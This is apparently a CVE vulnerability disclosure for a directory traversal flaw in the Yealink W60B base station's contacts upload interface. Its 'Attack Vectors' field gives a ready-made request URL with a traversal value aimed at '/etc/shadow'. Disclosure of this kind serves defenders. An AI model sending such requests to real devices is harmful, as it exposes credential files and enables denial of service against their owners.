CVE-2020-24113

[Description] Directory Traversal vulnerability in Contacts File Upload Interface in Yealink W60B version 77.83.0.85, allows attackers to gain sensitive information and cause a denial of service (DoS).

[Vulnerability Type]

Directory Traversal

[Affected Component]

Contacts file upload interface

[Attack Type]

Context-dependent

[Impact Denial of Service]

true

[Impact Information Disclosure]

true

[Attack Vectors]

You go to https://{IP}/servlet?m=mod_data&p=contacts-preview&q=load&handsetid=7&filename={file} and substitute the {file} parameter with the file you want to read, i.e. ../../etc/shadow or ../../proc/cpuinfo

[Discoverer]

fuomag9

[Reference]

http://yealink.com

[Vendor of Product]

Yealink

[Affected Product Code Base]

Yealink W60B 77.83.0.85